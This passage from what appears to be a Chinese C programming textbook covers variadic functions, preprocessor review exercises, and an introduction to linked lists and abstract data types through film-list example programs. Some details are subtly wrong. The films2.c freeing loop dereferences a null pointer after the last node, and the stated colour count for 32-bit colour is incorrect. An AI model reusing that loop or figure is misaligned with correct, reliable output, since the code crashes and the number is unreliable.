lim);     // 把ap初始化为参数列表 for (i = 0; i < lim; i++) tot += va_arg(ap, double); // 访问参数列表中的每一项 va_end(ap);           // 清理工作 return tot; } 下面是该程序的输出: return value for sum(3, 1.1, 2.5, 13.3):         16.9 return value for sum(6, 1.1, 2.1, 13.1, 4.1, 5.1, 6.1):  31.6 查看程序中的运算可以发现,第1次调用sum()时对3个数求和,第2次调 用时对6个数求和。 总而言之,使用变参函数比使用变参宏更复杂,但是函数的应用范围更 广。 1288 16.15 关键概念 C标准不仅描述C语言,还描述了组成C语言的软件包、C预处理器和C 标准库。通过预处理器可以控制编译过程、列出要替换的内容、指明要编译 的代码行和影响编译器其他方面的行为。C库扩展了C语言的作用范围,为 许多编程问题提供现成的解决方案。 1289 16.16 本章小结 C预处理器和C库是C语言的两个重要的附件。C预处理器遵循预处理器 指令,在编译源代码之前调整源代码。C 库提供许多有助于完成各种任务的 函数,包括输入、输出、文件处理、内存管理、排序与搜索、数学运算、字 符串处理等。附录B的参考资料V中列出了完整的ANSI C库。 1290 16.17 复习题 1.下面的几组代码由一个或多个宏组成,其后是使用宏的源代码。在每 种情况下代码的结果是什么?这些代码是否是有效代码?(假设其中的变量 已声明) a. #define FPM 5280 /*每英里的英尺数*/ dist = FPM * miles; b. 
#define FEET 4 #define POD FEET + FEET plort = FEET * POD; c. #define SIX = 6; nex = SIX; d. #define NEW(X) X + 5 y = NEW(y); berg = NEW(berg) * lob; est = NEW(berg) / NEW(y); 1291 nilp = lob * NEW(-berg); 2.修改复习题1中d部分的定义,使其更可靠。 3.定义一个宏函数,返回两值中的较小值。 4.定义EVEN_GT(X, Y)宏,如果X为偶数且大于Y,该宏返回1。 5.定义一个宏函数,打印两个表达式及其值。例如,若参数为3+4和 4*12,则打印: 3+4 is 7 and 4*12 is 48 6.创建#define指令完成下面的任务。 a.创建一个值为25的命名常量。 b.SPACE表示空格字符。 c.PS()代表打印空格字符。 d.BIG(X)代表X的值加3。 e.SUMSQ(X, Y)代表X和Y的平方和。 7.定义一个宏,以下面的格式打印名称、值和int类型变量的地址: name: fop; value: 23; address: ff464016 8.假设在测试程序时要暂时跳过一块代码,如何在不移除这块代码的前 提下完成这项任务? 9.编写一段代码,如果定义了PR_DATE宏,则打印预处理的日期。 10.内联函数部分讨论了3种不同版本的square()函数。从行为方面看, 这3种版本的函数有何不同? 1292 11.创建一个使用泛型选择表达式的宏,如果宏参数是_Bool类型, 对"boolean"求值,否则对"not boolean"求值。 12.下面的程序有什么错误? #include <stdio.h> int main(int argc, char argv[]) { printf("The square root of %f is %f\n", argv[1],sqrt(argv[1]) ); } 13.假设 scores 是内含 1000 个 int 类型元素的数组,要按降序排序该数 组中的值。假设你使用qsort()和comp()比较函数。 a.如何正确调用qsort()? b.如何正确定义comp()? 14.假设data1是内含100个double类型元素的数组,data2是内含300个 double类型元素的数组。 a.编写memcpy()的函数调用,把data2中的前100个元素拷贝到data1中。 b.编写memcpy()的函数调用,把data2中的后100个元素拷贝到data1中。 1293 16.18 编程练习 1.开发一个包含你需要的预处理器定义的头文件。 2.两数的调和平均数这样计算:先得到两数的倒数,然后计算两个倒数 的平均值,最后取计算结果的倒数。使用#define指令定义一个宏“函数”,执 行该运算。编写一个简单的程序测试该宏。 3.极坐标用向量的模(即向量的长度)和向量相对x轴逆时针旋转的角 度来描述该向量。直角坐标用向量的x轴和y轴的坐标来描述该向量(见图 16.3)。编写一个程序,读取向量的模和角度(单位:度),然后显示x轴 和y轴的坐标。相关方程如下: x = r*cos A y = r*sin A 需要一个函数来完成转换,该函数接受一个包含极坐标的结构,并返回 一个包含直角坐标的结构(或返回指向该结构的指针)。 图16.3 直角坐标和极坐标 4.ANSI库这样描述clock()函数的特性: 1294 #include <time.h> clock_t clock (void); 这里,clock_t是定义在time.h中的类型。该函数返回处理器时间,其单 位取决于实现(如果处理器时间不可用或无法表示,该函数将返回-1)。然 而,CLOCKS_PER_SEC(也定义在time.h中)是每秒处理器时间单位的数 量。因此,两个 clock()返回值的差值除以 CLOCKS_PER_SEC得到两次调用 之间经过的秒数。在进行除法运算之前,把值的类型强制转换成double类 型,可以将时间精确到小数点以后。编写一个函数,接受一个double类型的 参数表示时间延迟数,然后在这段时间运行一个循环。编写一个简单的程序 测试该函数。 5.编写一个函数接受这些参数:内含int类型元素的数组名、数组的大小 和一个代表选取次数的值。该函数从数组中随机选择指定数量的元素,并打 印它们。每个元素只能选择一次(模拟抽奖数字或挑选陪审团成员)。另 外,如果你的实现有time()(第12章讨论过)或类似的函数,可在srand()中 使用这个函数的输出来初始化随机数生成器rand()。编写一个简单的程序测 试该函数。 6.修改程序清单16.17,使用struct names元素(在程序清单16.17后面的 讨论中定义过),而不是double类型的数组。使用较少的元素,并用选定的 名字显式初始化数组。 7.下面是使用变参函数的一个程序段: #include <stdio.h> #include <stdlib.h> #include <stdarg.h> void show_array(const double ar[], int n); 1295 double * new_d_array(int n, ...); int main() { double * p1; double * p2; p1 = new_d_array(5, 1.2, 2.3, 3.4, 4.5, 5.6); p2 = new_d_array(4, 100.0, 20.00, 8.08, -1890.0); show_array(p1, 5); show_array(p2, 4); free(p1); free(p2); return 0; } new_d_array()函数接受一个int类型的参数和double类型的参数。该函数 返回一个指针,指向由malloc()分配的内存块。int类型的参数指定了动态数 组中的元素个数,double类型的值用于初始化元素(第1个值赋给第1个元 素,以此类推)。编写show_array()和new_d_array()函数的代码,完成这个 程序。 1296 第17章高级数据表示 本章介绍以下内容: 函数:进一步学习malloc() 使用C表示不同类型的数据 新的算法,从概念上增强开发程序的能力 抽象数据类型(ADT) 学习计算机语言和学习音乐、木工或工程学一样。首先,要学会使用工 具:学习如何演奏音阶、如何使用锤子等,然后解决各种问题,如降落、滑 行以及平衡物体之类。到目前为止,读者一直在本书中学习和练习各种编程 技能,如创建变量、结构、函数等。然而,如果想提高到更高层次时,工具 是次要的,真正的挑战是设计和创建一个项目。本章将重点介绍这个更高的 层次,教会读者如何把项目看作一个整体。本章涉及的内容可能比较难,但 是这些内容非常有价值,将帮助读者从编程新手成长为老手。 我们先从程序设计的关键部分,即程序表示数据的方式开始。通常,程 序开发最重要的部分是找到程序中表示数据的好方法。正确地表示数据可以 更容易地编写程序其余部分。到目前为止,读者应该很熟悉C的内置类型: 简单变量、数组、指针、结构和联合。 然而,找出正确的数据表示不仅仅是选择一种数据类型,还要考虑必须 进行哪些操作。也就是说,必须确定如何储存数据,并且为数据类型定义有 效的操作。例如,C实现通常把int类型和指针类型都储存为整数,但是这两 种类型的有效操作不相同。例如,两个整数可以相乘,但是两个指针不能相 乘;可以用*运算符解引用指针,但是对整数这样做毫无意义。C 语言为它 的基本类型都定义了有效的操作。但是,当你要设记数据表示的方案时,你 可能需要自己定义有效操作。在C语言中,可以把所需的操作设计成C函数 1297 来表示。简而言之,设计一种数据类型包括设计如何储存该数据类型和设计 一系列管理该数据的函数。 本章还会介绍一些算法(algorithm),即操控数据的方法。作为一名程 序员,应该掌握这些可以反复解决类似问题的处理方法。 本章将进一步研究设计数据类型的过程,这是一个把算法和数据表示相 匹配的过程。期间会用到一些常见的数据形式,如队列、列表和二叉树。 本章还将介绍抽象数据类型(ADT)的概念。抽象数据类型以面向问题 
而不是面向语言的方式,把解决问题的方法和数据表示结合起来。设计一个 ADT后,可以在不同的环境中复用。理解ADT可以为将来学习面向对象程序 设计(OOP)以及C++语言做好准备。 1298 17.1 研究数据表示 我们先从数据开始。假设要创建一个地址簿程序。应该使用什么数据形 式储存信息?由于储存的每一项都包含多种信息,用结构来表示每一项很合 适。如何表示多个项?是否用标准的结构数组?还是动态数组?还是一些其 他形式?各项是否按字母顺序排列?是否要按照邮政编码(或地区编码)查 找各项?需要执行的行为将影响如何储存信息?简而言之,在开始编写代码 之前,要在程序设计方面做很多决定。 如何表示储存在内存中的位图图像?位图图像中的每个像素在屏幕上都 单独设置。在以前黑白屏的年代,可以使用一个计算机位(1 或 0)来表示 一个像素点(开或闭),因此称之为位图。对于彩色显示器而言,如果8位 表示一个像素,可以得到256种颜色。现在行业标准已发展到65536色(每像 素16位)、16777216色(每像素24位)、2147483色(每像素32位),甚至 更多。如果有32位色,且显示器有2560×1440的分辨率,则需要将近1.18亿 位(14M)来表示一个屏幕的位图图像。是用这种方法表示,还是开发一种 压缩信息的方法?是有损压缩(丢失相对次要的数据)还是无损压缩(没有 丢失数据)?再次提醒读者注意,在开始编写代码之前,需要做很多程序设 计方面的决定。 我们来处理一个数据表示的示例。假设要编写一个程序,让用户输入一 年内看过的所有电影(包括DVD和蓝光光碟)。要储存每部影片的各种信 息,如片名、发行年份、导演、主演、片长、影片的种类(喜剧、科幻、爱 情等)、评级等。建议使用一个结构储存每部电影,一个数组储存一年内看 过的电影。为简单起见,我们规定结构中只有两个成员:片名和评级(0~ 10)。程序清单17.1演示了一个基本的实现。 程序清单17.1 films1.c程序 /* films1.c -- 使用一个结构数组 */ #include <stdio.h> 1299 #include <string.h> #define TSIZE   45 /* 储存片名的数组大小 */ #define FMAX   5  /* 影片的最大数量 */ struct film { char title[TSIZE]; int rating; }; char * s_gets(char str[], int lim); int main(void) { struct film movies[FMAX]; int i = 0; int j; puts("Enter first movie title:"); while (i < FMAX && s_gets(movies[i].title, TSIZE) !=  NULL && movies[i].title[0] != '\0') { puts("Enter your rating <0-10>:"); 1300 scanf("%d", &movies[i++].rating); while (getchar() != '\n') continue; puts("Enter next movie title (empty line to stop):"); } if (i == 0) printf("No data entered. "); else printf("Here is the movie list:\n"); for (j = 0; j < i; j++) printf("Movie: %s  Rating: %d\n", movies[j].title,movies[j].rating); printf("Bye!\n"); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); 1301 if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)           // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;      // 处理剩余输入行 } return ret_val; } 该程序创建了一个结构数组,然后把用户输入的数据储存在数组中。直 到数组已满(用 FMAX 进行判断)或者到达文件结尾(用NULL进行判 断),或者用户在首行按下Enter键(用'\0'进行判断),输入才会终止。 这样设计程序有点问题。首先,该程序很可能会浪费许多空间,因为大 部分的片名都不会超过40个字符。但是,有些片名的确很长,如The Discreet Charm of the Bourgeoisie和Won Ton Ton, The Dog Who Saved Hollywood。其次,许多人会觉得每年5部电影的限制太严格了。当然,也可 以放宽这个限制,但是,要多大才合适?有些人每年可以看500部电影,因 此可以把FMAX改为500。但是,对有些人而言,这可能仍然不够,而对有 些人而言一年根本看不了这么多部电影,这样就浪费了大量的内存。另外, 一些编译器对自动存储类别变量(如 movies)可用的内存数量设置了一个 默认的限制,如此大型的数组可能会超过默认设置的值。可以把数组声明为 1302 静态或外部数组,或者设置编译器使用更大的栈来解决这个问题。但是,这 样做并不能根本解决问题。 该程序真正的问题是,数据表示太不灵活。程序在编译时确定所需内存 量,其实在运行时确定会更好。要解决这个问题,应该使用动态内存分配来 表示数据。可以这样做: #define TSIZE 45 /*储存片名的数组大小*/ struct film { char title[TSIZE]; int rating; }; ... int n, i; struct film * movies; /* 指向结构的指针 */ ... 
printf("Enter the maximum number of movies you'll enter:\n"); scanf("%d", &n); movies = (struct film *) malloc(n * sizeof(struct film)); 第12章介绍过,可以像使用数组名那样使用指针movies。 while (i < FMAX && s_gets(movies[i].title, TSIZE) != NULL &&movies[i].title[0] != '\0') 1303 使用malloc(),可以推迟到程序运行时才确定数组中的元素数量。所 以,如果只需要20个元素,程序就不必分配存放500个元素的空间。但是, 这样做的前提是,用户要为元素个数提供正确的值。 1304 17.2 从数组到链表 理想的情况是,用户可以不确定地添加数据(或者不断添加数据直到用 完内存量),而不是先指定要输入多少项,也不用让程序分配多余的空间。 这可以通过在输入每一项后调用 malloc()分配正好能储存该项的空间。如果 用户输入3部影片,程序就调用malloc()3次;如果用户输入300部影片,程序 就调用malloc()300次。 不过,我们又制造了另一个麻烦。比较一下,一种方法是调用malloc() 一次,为300个filem结构请求分配足够的空间;另一种方法是调用 malloc()300次,分别为每个file结构请求分配足够的空间。前者分配的是连 续的内存块,只需要一个单独的指向struct变量(film)的指针,该指针指向 已分配块中的第1个结构。简单的数组表示法让指针访问块中的每个结构, 如前面代码段所示。第2种方法的问题是,无法保证每次调用malloc()都能分 配到连续的内存块。这意味着结构不一定被连续储存(见图17.1)。因此, 与第1种方法储存一个指向300个结构块的指针相比,你需要储存300个指 针,每个指针指向一个单独储存的结构。 1305 图17.1 一块内存中分配结构和单独分配结构 一种解决方法是创建一个大型的指针数组,并在分配新结构时逐个给这 些指针赋值,但是我们不打算使用这种方法: #define TSIZE 45 /*储存片名的数组大小*/ #define FMAX 500 /*影片的最大数量*/ struct film { char title[TSIZE]; 1306 int rating; }; ... struct film * movies[FMAX]; /* 结构指针数组 */ int i; ... movies[i] = (struct film *) malloc (sizeof (struct film)); 如果用不完500个指针,这种方法节约了大量的内存,因为内含500个指 针的数组比内含500个结构的数组所占的内存少得多。尽管如此,如果用不 到 500 个指针,还是浪费了不少空间。而且,这样还是有500个结构的限 制。 还有一种更好的方法。每次使用 malloc()为新结构分配空间时,也为新 指针分配空间。但是,还得需要另一个指针来跟踪新分配的指针,用于跟踪 新指针的指针本身,也需要一个指针来跟踪,以此类推。要重新定义结构才 能解决这个潜在的问题,即每个结构中包含指向 next 结构的指针。然后, 当创建新结构时,可以把该结构的地址储存在上一个结构中。简而言之,可 以这样定义film结构: #define TSIZE 45 /* 储存片名的数组大小*/ struct film { char title[TSIZE]; int rating; struct film * next; 1307 }; 虽然结构不能含有与本身类型相同的结构,但是可以含有指向同类型结 构的指针。这种定义是定义链表(linked list)的基础,链表中的每一项都包 含着在何处能找到下一项的信息。 在学习链表的代码之前,我们先从概念上理解一个链表。假设用户输入 的片名是Modern Times,等级为10。程序将为film类型的结构分配空间,把 字符串Modern Times拷贝到结构中的title成员中,然后设置rating成员为10。 为了表明该结构后面没有其他结构,程序要把next成员指针设置为 NULL(NULL是一个定义在stdio.h头文件中的符号常量,表示空指针)。当 然,还需要一个单独的指针储存第1个结构的地址,该指针被称为头指针 (head pointer)。头指针指向链表中的第1项。图17.2演示了这种结构(为 节约图片空间,压缩了title成员中的空白)。 图17.2 链表中的第1个项 现在,假设用户输入第2部电影及其评级,如Midnight in Paris和8。程序 为第2个film类型结构分配空间,把新结构的地址储存在第1个结构的next成 员中(擦写了之前储存在该成员中的NULL),这样链表中第1个结构中的 next指针指向第2个结构。然后程序把Midnight in Paris和8拷贝到新结构中, 1308 并把第2个结构中的next成员设置为NULL,表明该结构是链表中的最后一个 结构。图17.3演示了这两个项。 图17.3 链表中的两个项 每加入一部新电影,就以相同的方式来处理。新结构的地址将储存在上 一个结构中,新信息储存在新结构中,而且新结构中的next成员设置为 NULL。从而建立起如图17.4所示的链表。 1309 图17.4 链表中的多个项 假设要显示这个链表,每显示一项,就可以根据该项中已储存的地址来 定位下一个待显示的项。然而,这种方案能正常运行,还需要一个指针储存 链表中第1项的地址,因为链表中没有其他项储存该项的地址。此时,头指 针就派上了用场。 17.2.1 使用链表 1310 从概念上了解了链表的工作原理,接着我们来实现它。程序清单17.2修 改了程序清单17.1,用链表而不是数组来储存电影信息。 程序清单17.2 films2.c程序 /* films2.c -- 使用结构链表 */ #include <stdio.h> #include <stdlib.h>    /* 提供malloc()原型 */ #include <string.h>    /* 提供strcpy()原型 */ #define TSIZE  45    /* 储存片名的数组大小 */ struct film { char title[TSIZE]; int rating; struct film * next;  /* 指向链表中的下一个结构 */ }; char * s_gets(char * st, int n); int main(void) { struct film * head = NULL; struct film * prev, *current; char input[TSIZE]; 1311 /* 收集并储存信息 */ puts("Enter first movie title:"); while (s_gets(input, TSIZE) != NULL && input[0] != '\0') { current = (struct film *) malloc(sizeof(struct film)); if (head == NULL)   /* 第1个结构 */ head = current; else          /* 后续的结构 */ prev->next = current; current->next = NULL; strcpy(current->title, input); puts("Enter your rating <0-10>:"); scanf("%d", &current->rating); while (getchar() != '\n') continue; puts("Enter next movie title (empty line to stop):"); prev = current; } /* 显示电影列表 */ 1312 if (head == NULL) printf("No data entered. 
"); else printf("Here is the movie list:\n"); current = head; while (current != NULL) { printf("Movie: %s  Rating: %d\n", current->title, current->rating); current = current->next; } /* 完成任务,释放已分配的内存 */ current = head; while (current != NULL) { current = head; head = current->next; free(current); } 1313 printf("Bye!\n"); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)        // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;    // 处理剩余输入行 } return ret_val; } 1314 该程序用链表执行两个任务。第 1 个任务是,构造一个链表,把用户输 入的数据储存在链表中。第 2个任务是,显示链表。显示链表的任务比较简 单,所以我们先来讨论它。 1.显示链表 显示链表从设置一个指向第1个结构的指针(名为current)开始。由于 头指针(名为head)已经指向链表中的第1个结构,所以可以用下面的代码 来完成: current = head; 然后,可以使用指针表示法访问结构的成员: printf("Movie: %s Rating: %d\n", current->title, current->rating); 下一步是根据储存在该结构中next成员中的信息,重新设置current指针 指向链表中的下一个结构。代码如下: current = current->next; 完成这些之后,再重复整个过程。当显示到链表中最后一个项时, current 将被设置为 NULL,因为这是链表最后一个结构中next成员的值。 while (current != NULL) { printf("Movie: %s Rating: %d\n", current->title, current->rating); current = current->next; } 遍历链表时,为何不直接使用head指针,而要重新创建一个新指针 (current)?因为如果使用head会改变head中的值,程序就找不到链表的开 1315 始处。 2.创建链表 创建链表涉及下面3步: (1)使用malloc()为结构分配足够的空间; (2)储存结构的地址; (3)把当前信息拷贝到结构中。 如无必要不用创建一个结构,所以程序使用临时存储区(input数组)获 取用户输入的电影名。如果用户通过键盘模拟EOF或输入一行空行,将退出 下面的循环: while (s_gets(input, TSIZE) != NULL && input[0] != '\0') 如果用户进行输入,程序就分配一个结构的空间,并将其地址赋给指针 变量current: current = (struct film *) malloc(sizeof(struct film)); 链表中第1 个结构的地址应储存在指针变量head中。随后每个结构的地 址应储存在其前一个结构的next成员中。因此,程序要知道它处理的是否是 第1个结构。最简单的方法是在程序开始时,把head指针初始化为NULL。然 后,程序可以使用head的值进行判断: if (head == NULL) /* 第1个结构*/ head = current; else /* subsequent structures */ prev->next = current; 1316 在上面的代码中,指针prev指向上一次分配的结构。 接下来,必须为结构成员设置合适的值。尤其是,把next成员设置为 NULL,表明当前结构是链表的最后一个结构。还要把input数组中的电影名 拷贝到title成员中,而且要给rating成员提供一个值。如下代码所示: current->next = NULL; strcpy(current->title, input); puts("Enter your rating <0-10>:"); scanf("%d", &current->rating); 由于s_gets()限制了只能输入TSIZE-1个字符,所以用strcpy()函数把input 数组中的字符串拷贝到title成员很安全。 最后,要为下一次输入做好准备。尤其是,要设置 prev 指向当前结 构。因为在用户输入下一部电影且程序为新结构分配空间后,当前结构将成 为新结构的上一个结构,所以程序在循环末尾这样设置该指针: prev = current; 程序是否能正常运行?下面是该程序的一个运行示例: Enter first movie title: Spirited Away Enter your rating <0-10>: 9 Enter next movie title (empty line to stop): The Duelists 1317 Enter your rating <0-10>: 8 Enter next movie title (empty line to stop): Devil Dog: The Mound of Hound Enter your rating <0-10>: 1 Enter next movie title (empty line to stop): Here is the movie list: Movie: Spirited Away Rating: 9 Movie: The Duelists Rating: 8 Movie: Devil Dog: The Mound of Hound Rating: 1 Bye! 
3.释放链表 在许多环境中,程序结束时都会自动释放malloc()分配的内存。但是, 最好还是成对调用malloc()和free()。因此,程序在清理内存时为每个已分配 的结构都调用了free()函数: current = head; while (current != NULL) { current = head; 1318 head = current->next; free(current); } 17.2.2 反思 films2.c 程序还有些不足。例如,程序没有检查 malloc()是否成功请求 到内存,也无法删除链表中的项。这些不足可以弥补。例如,添加代码检查 malloc()的返回值是否是NULL(返回NULL说明未获得所需内存)。如果程 序要删除链表中的项,还要编写更多的代码。 这种用特定方法解决特定问题,并且在需要时才添加相关功能的编程方 式通常不是最好的解决方案。另一方面,通常都无法预料程序要完成的所有 任务。随着编程项目越来越大,一个程序员或编程团队事先计划好一切模 式,越来越不现实。很多成功的大型程序都是由成功的小型程序逐步发展而 来。 如果要修改程序,首先应该强调最初的设计,并简化其他细节。程序清 单 17.2 中的程序示例没有遵循这个原则,它把概念模型和代码细节混在一 起。例如,该程序的概念模型是在一个链表中添加项,但是程序却把一些细 节(如,malloc()和 current->next 指针)放在最明显的位置,没有突出接 口。如果程序能以某种方式强调给链表添加项,并隐藏具体的处理细节(如 调用内存管理函数和设置指针)会更好。把用户接口和代码细节分开的程 序,更容易理解和更新。学习下面的内容就可以实现这些目标。 1319 17.3 抽象数据类型(ADT) 在编程时,应该根据编程问题匹配合适的数据类型。例如,用int类型代 表你有多少双鞋,用float或 double 类型代表每双鞋的价格。在前面的电影示 例中,数据构成了链表,每个链表项由电影名(C 字符串)和评级(一个int 类型值)。C中没有与之匹配的基本类型,所以我们定义了一个结构代表单 独的项,然后设计了一些方法把一系列结构构成一个链表。本质上,我们使 用 C语言的功能设计了一种符合程序要求的新数据类型。但是,我们的做法 并不系统。现在,我们用更系统的方法来定义数据类型。 什么是类型?类型特指两类信息:属性和操作。例如,int 类型的属性 是它代表一个整数值,因此它共享整数的属性。允许对int类型进行算术操作 是:改变int类型值的符号、两个int类型值相加、相减、相乘、相除、求模。 当声明一个int类型的变量时,就表明了只能对该变量进行这些操作。 注意 整数属性 C的int类型背后是一个更抽象的整数概念。数学家已经用正式的抽象方 式定义了整数的属性。例如,假设N和M是整数,那么N+M=M+N;假设S、 Q也是整数,如果N+M=S,而且N+Q=S,那么M=Q。可以认为数学家提供 了整数的抽象概念,而C则实现了这一抽象概念。注意,实现整数的算术运 算是表示整数必不可少的部分。如果只是储存值,并未在算术表达式中使 用,int类型就没那么有用了。还要注意的是,C并未很好地实现整数。例 如,整数是无穷大的数,但是2字节的int类型只能表示65536个整数。因此, 不要混淆抽象概念和具体的实现。 假设要定义一个新的数据类型。首先,必须提供储存数据的方法,例如 设计一个结构。其次,必须提供操控数据的方法。例如,考虑films2.c程序 (程序清单17.2)。该程序用链接的结构来储存信息,而且通过代码实现了 如何添加和显示信息。尽管如此,该程序并未清楚地表明正在创建一个新类 型。我们应该怎么做? 1320 计算机科学领域已开发了一种定义新类型的好方法,用3个步骤完成从 抽象到具体的过程。 1.提供类型属性和相关操作的抽象描述。这些描述既不能依赖特定的实 现,也不能依赖特定的编程语言。这种正式的抽象描述被称为抽象数据类型 (ADT)。 2.开发一个实现 ADT 的编程接口。也就是说,指明如何储存数据和执 行所需操作的函数。例如在 C中,可以提供结构定义和操控该结构的函数原 型。这些作用于用户定义类型的函数相当于作用于 C基本类型的内置运算 符。需要使用该新类型的程序员可以使用这个接口进行编程。 3.编写代码实现接口。这一步至关重要,但是使用该新类型的程序员无 需了解具体的实现细节。 我们再次以前面的电影项目为例来熟悉这个过程,并用新方法重新完成 这个示例。 17.3.1 建立抽象 从根本上看,电影项目所需的是一个项链表。每一项包含电影名和评 级。你所需的操作是把新项添加到链表的末尾和显示链表中的内容。我们把 需要处理这些需求的抽象类型叫作链表。链表具有哪些属性?首先,链表应 该能储存一系列的项。也就是说,链表能储存多个项,而且这些项以某种方 式排列,这样才能描述链表的第1项、第2项或最后一项。其次,链表类型应 该提供一些操作,如在链表中添加新项。下面是链表的一些有用的操作: 初始化一个空链表; 在链表末尾添加一个新项; 确定链表是否为空; 确定链表是否已满; 1321 确定链表中的项数; 访问链表中的每一项执行某些操作,如显示该项。 对该电影项目而言,暂时不需要其他操作。但是一般的链表还应包含以 下操作: 在链表的任意位置插入一个项; 移除链表中的一个项; 在链表中检索一个项(不改变链表); 用另一个项替换链表中的一个项; 在链表中搜索一个项。 非正式但抽象的链表定义是:链表是一个能储存一系列项且可以对其进 行所需操作的数据对象。该定义既未说明链表中可以储存什么项,也未指定 是用数组、结构还是其他数据形式来储存项,而且并未规定用什么方法来实 现操作(如,查找链表中元素的个数)。这些细节都留给实现完成。 为了让示例尽量简单,我们采用一种简化的链表作为抽象数据类型。它 只包含电影项目中的所需属性。该类型总结如下: 类型名:    简单链表 类型属性:    可以储存一系列项 类型操作:    初始化链表为空 确定链表为空 确定链表已满 确定链表中的项数 1322 在链表末尾添加项 遍历链表,处理链表中的项 清空链表 下一步是为开发简单链表ADT开发一个C接口。 17.3.2 建立接口 这个简单链表的接口有两个部分。第1部分是描述如何表示数据,第2部 分是描述实现ADT操作的函数。例如,要设计在链表中添加项的函数和报告 链表中项数的函数。接口设计应尽量与ADT的描述保持一致。因此,应该用 某种通用的Item类型而不是一些特殊类型,如int或struct film。可以用C的 typedef功能来定义所需的Item类型: #define TSIZE 45 /* 储存电影名的数组大小 */ struct film { char title[TSIZE]; int rating; }; typedef struct film Item; 然后,就可以在定义的其余部分使用 Item 类型。如果以后需要其他数 据形式的链表,可以重新定义Item类型,不必更改其余的接口定义。 定义了 Item 之后,现在必须确定如何储存这种类型的项。实际上这一 步属于实现步骤,但是现在决定好可以让示例更简单些。在films2.c程序中 用链接的结构处理得很好,所以,我们在这里也采用相同的方法: 1323 typedef struct node { Item item; struct node * next; } Node; typedef Node * List; 在链表的实现中,每一个链节叫作节点(node)。每个节点包含形成链 表内容的信息和指向下一个节点的指针。为了强调这个术语,我们把node作 为节点结构的标记名,并使用typedef把Node作为struct node结构的类型名。 最后,为了管理链表,还需要一个指向链表开始处的指针,我们使用typedef 把List作为该类型的指针名。因此,下面的声明: List movies; 创建了该链表所需类型的指针movies。 这是否是定义List类型的唯一方法?不是。例如,还可以添加一个变量 记录项数: typedef struct list { Node * head; /* 指向链表头的指针 */ int size;   /* 链表中的项数 */ } List;      /* List的另一种定义 */ 可以像稍后的程序示例中那样,添加第2 个指针储存链表的末尾。现 
1324 在,我们还是使用 List类型的第1种定义。这里要着重理解下面的声明创建 了一个链表,而不一个指向节点的指针或一个结构: List movies; movies代表的确切数据应该是接口层次不可见的实现细节。 例如,程序启动后应把头指针初始化为NULL。但是,不要使用下面这 样的代码: movies = NULL; 为什么?因为稍后你会发现List类型的结构实现更好,所以应这样初始 化: movies.next = NULL; movies.size = 0; 使用List的人都不用担心这些细节,只要能使用下面的代码就行: InitializeList(movies); 使用该类型的程序员只需知道用InitializeList()函数来初始化链表,不必 了解List类型变量的实现细节。这是数据隐藏的一个示例,数据隐藏是一种 从编程的更高层次隐藏数据表示细节的艺术。 为了指导用户使用,可以在函数原型前面提供以下注释: /* 操作:初始化一个链表      */ /* 前提条件:plist指向一个链表*/ /* 后置条件:该链表初始化为空    */ void InitializeList(List * plist); 1325 这里要注意3点。第1,注释中的“前提条件”(precondition)是调用该函 数前应具备的条件。例如,需要一个待初始化的链表。第2,注释中的“后置 条件”(postcondition)是执行完该函数后的情况。第3,该函数的参数是一 个指向链表的指针,而不是一个链表。所以应该这样调用该函数: InitializeList(&movies); 由于按值传递参数,所以该函数只能通过指向该变量的指针才能更改主 调程序传入的变量。这里,由于语言的限制使得接口和抽象描述略有区别。 C 语言把所有类型和函数的信息集合成一个软件包的方法是:把类型定 义和函数原型(包括前提条件和后置条件注释)放在一个头文件中。该文件 应该提供程序员使用该类型所需的所有信息。程序清单 17.3给出了一个简单 链表类型的头文件。该程序定义了一个特定的结构作为Item类型,然后根据 Item定义了Node,再根据Node定义了List。然后,把表示链表操作的函数设 计为接受Item类型和List类型的参数。如果函数要修改一个参数,那么该参 数的类型应是指向相应类型的指针,而不是该类型。在头文件中,把组成函 数名的每个单词的首字母大写,以这种方式表明这些函数是接口包的一部 分。另外,该文件使用第16章介绍的#ifndef指令,防止多次包含一个文件。 如果编译器不支持C99的bool类型,可以用下面的代码: enum bool {false, true}; /* 把bool定义为类型,false和true是该类型的值 */ 替换下面的头文件: #include <stdbool.h> /* C99特性 */ 程序清单17.3 list.h接口头文件 /* list.h -- 简单链表类型的头文件 */ #ifndef LIST_H_ #define LIST_H_ 1326 #include <stdbool.h> /* C99特性      */ /* 特定程序的声明 */ #define TSIZE   45 /* 储存电影名的数组大小  */ struct film { char title[TSIZE]; int rating; }; /* 一般类型定义 */ typedef struct film Item; typedef struct node { Item item; struct node * next; } Node; typedef Node * List; /* 函数原型 */ /* 操作:   初始化一个链 表                       */ 1327 /* 前提条件:  plist指向一个链 表                     */ /* 后置条件:  链表初始化为 空                       */ void InitializeList(List * plist); /* 操作:   确定链表是否为空定义,plist指向一个已初始化的链 表        */ /* 后置条件:  如果链表为空,该函数返回true;否则返回 false         */ bool ListIsEmpty(const List *plist); /* 操作:   确定链表是否已满,plist指向一个已初始化的链 表         */ /* 后置条件:  如果链表已满,该函数返回真;否则返回 假             */ bool ListIsFull(const List *plist); /* 操作:   确定链表中的项数, plist指向一个已初始化的链 表         */ /* 后置条件:  该函数返回链表中的项 数                   */ unsigned int ListItemCount(const List *plist); /* 操作:   在链表的末尾添加 项                     */ 1328 /* 前提条件:  item是一个待添加至链表的项, plist指向一个已初始化 的链表    */ /* 后置条件:  如果可以,该函数在链表末尾添加一个项,且返回 true;否则返回false */ bool AddItem(Item item, List * plist); /* 操作:   把函数作用于链表中的每一 项                  */ /*      plist指向一个已初始化的链 表                 */ /*      pfun指向一个函数,该函数接受一个Item类型的参数, 且无返回值   */ /* 后置条件:  pfun指向的函数作用于链表中的每一项一 次            */ void Traverse(const List *plist, void(*pfun)(Item item)); /* 操作:   释放已分配的内存(如果有的 话)                */ /*      plist指向一个已初始化的链 表                 */ /* 后置条件:  释放了为链表分配的所有内存,链表设置为 空            */ void EmptyTheList(List * plist); #endif 1329 只有InitializeList()、AddItem()和EmptyTheList()函数要修改链表,因此从 技术角度看,这些函数需要一个指针参数。然而,如果某些函数接受 List 类 型的变量作为参数,而其他函数却接受 